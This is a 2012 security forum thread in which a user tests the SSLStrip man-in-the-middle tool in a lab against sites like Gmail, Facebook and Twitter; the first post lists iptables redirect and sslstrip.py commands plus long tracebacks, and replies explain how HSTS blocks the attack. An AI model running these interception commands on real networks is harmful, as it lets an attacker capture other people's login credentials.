diggler Posted January 15, 2012 Share Posted January 15, 2012 (edited) Hey Guys, Can anyone confirm the same results? When testing in my lab SSLStrip works/doesn't work with the following sites: NOTE: client browser Google chrome 17.0.963.33 beta on mac os x YES -linkedin.com -facebook.com NO -mail.google.com -twitter.com If other's get the same result. Could it be that the big co's have found a way to prevent the attack? I get the following error output from SSLStrip after visiting GMAIL. MK3 AP51 v2.0.1 /w BT5R1 cd /pentest/web/sslstrip chmod +x sslstrip.py iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 ./sslstrip.py -l 10000 -k -f tail -f sslstrip.log root@bt:~/pentest# cd /pentest/web/sslstrip/ root@bt:/pentest/web/sslstrip# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 root@bt:/pentest/web/sslstrip# ./sslstrip.py -l 10000 -k -f sslstrip 0.9 by Moxie Marlinspike running... Traceback (most recent call last): File "./sslstrip.py", line 105, in main reactor.run() File "/usr/lib/python2.6/dist-packages/twisted/internet/base.py", line 1170, in run self.mainLoop() File "/usr/lib/python2.6/dist-packages/twisted/internet/base.py", line 1182, in mainLoop self.doIteration(t) File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 140, in doSelect _logrun(selectable, _drdw, selectable, method, dict) --- <exception caught here> --- File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 84, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 69, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 59, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 37, in callWithContext return func(*args,**kw) File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 156, in _doReadOrWrite self._disconnectSelectable(selectable, why, method=="doRead") File "/usr/lib/python2.6/dist-packages/twisted/internet/posixbase.py", line 191, in _disconnectSelectable selectable.readConnectionLost(f) File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 508, in readConnectionLost self.connectionLost(reason) File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 677, in connectionLost Connection.connectionLost(self, reason) File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 519, in connectionLost protocol.connectionLost(reason) File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 489, in connectionLost self.handleResponseEnd() File "/pentest/web/sslstrip/sslstrip/ServerConnection.py", line 119, in handleResponseEnd HTTPClient.handleResponseEnd(self) File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 500, in handleResponseEnd self.handleResponse(B) File "/pentest/web/sslstrip/sslstrip/ServerConnection.py", line 134, in handleResponse self.shutdown() File "/pentest/web/sslstrip/sslstrip/ServerConnection.py", line 154, in shutdown self.client.finish() File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 900, in finish "Request.finish called on a request after its connection was lost; " exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this. Traceback (most recent call last): File "./sslstrip.py", line 105, in main reactor.run() File "/usr/lib/python2.6/dist-packages/twisted/internet/base.py", line 1170, in run self.mainLoop() File "/usr/lib/python2.6/dist-packages/twisted/internet/base.py", line 1182, in mainLoop self.doIteration(t) File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 140, in doSelect _logrun(selectable, _drdw, selectable, method, dict) --- <exception caught here> --- File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 84, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 69, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 59, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 37, in callWithContext return func(*args,**kw) File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 156, in _doReadOrWrite self._disconnectSelectable(selectable, why, method=="doRead") File "/usr/lib/python2.6/dist-packages/twisted/internet/posixbase.py", line 191, in _disconnectSelectable selectable.readConnectionLost(f) File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 508, in readConnectionLost self.connectionLost(reason) File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 677, in connectionLost Connection.connectionLost(self, reason) File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 519, in connectionLost protocol.connectionLost(reason) File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 489, in connectionLost self.handleResponseEnd() File "/pentest/web/sslstrip/sslstrip/ServerConnection.py", line 119, in handleResponseEnd HTTPClient.handleResponseEnd(self) File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 500, in handleResponseEnd self.handleResponse(B) File "/pentest/web/sslstrip/sslstrip/ServerConnection.py", line 134, in handleResponse self.shutdown() File "/pentest/web/sslstrip/sslstrip/ServerConnection.py", line 154, in shutdown self.client.finish() File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 900, in finish "Request.finish called on a request after its connection was lost; " exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this. Edited January 16, 2012 by diggler Quote Link to comment Share on other sites More sharing options...
diggler Posted January 16, 2012 Author Share Posted January 16, 2012 (edited) I received this comment from the man himself... "Both use HSTS headers now, so if you're using a browser that supports them (like Chrome), there's no opportunity for sslstrip to do anything. That output is from Twisted,and it doesn't indicate any actual problem." UPDATE1: http://www.owasp.or...nsport_Security UPDATE2: SSLStrip still works against Safari Definitely broken with FF and Chrome tho : ( Now what? UPDATE3: "HSTS fixes this problem by informing the browser that connections to the site should always use SSL. Of course, the HSTS header can be stripped by the attacker if this is the user's first visit.Chrome attempts to limit this problem by including a hard-coded list of HSTS sites.[11] Unfortunately this solution cannot scale to include all websites on the internet; a more workable solution can be achieved by including HSTS data inside DNS records, and accessing them securely via DNSSEC." Edited January 16, 2012 by diggler Quote Link to comment Share on other sites More sharing options...
telot Posted January 16, 2012 Share Posted January 16, 2012 I received this comment from the man himself... "Both use HSTS headers now, so if you're using a browser that supports them (like Chrome), there's no opportunity for sslstrip to do anything. That output is from Twisted,and it doesn't indicate any actual problem." UPDATE1: http://www.owasp.or...nsport_Security UPDATE2: SSLStrip still works against Safari Definitely broken with FF and Chrome tho : ( Now what? UPDATE3: "HSTS fixes this problem by informing the browser that connections to the site should always use SSL. Of course, the HSTS header can be stripped by the attacker if this is the user's first visit.Chrome attempts to limit this problem by including a hard-coded list of HSTS sites.[11] Unfortunately this solution cannot scale to include all websites on the internet; a more workable solution can be achieved by including HSTS data inside DNS records, and accessing them securely via DNSSEC." Thanks for following through on this Diggler! I was just going to get into sslstrip this weekend, so this is some great food for thought. Thanks very much telot Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.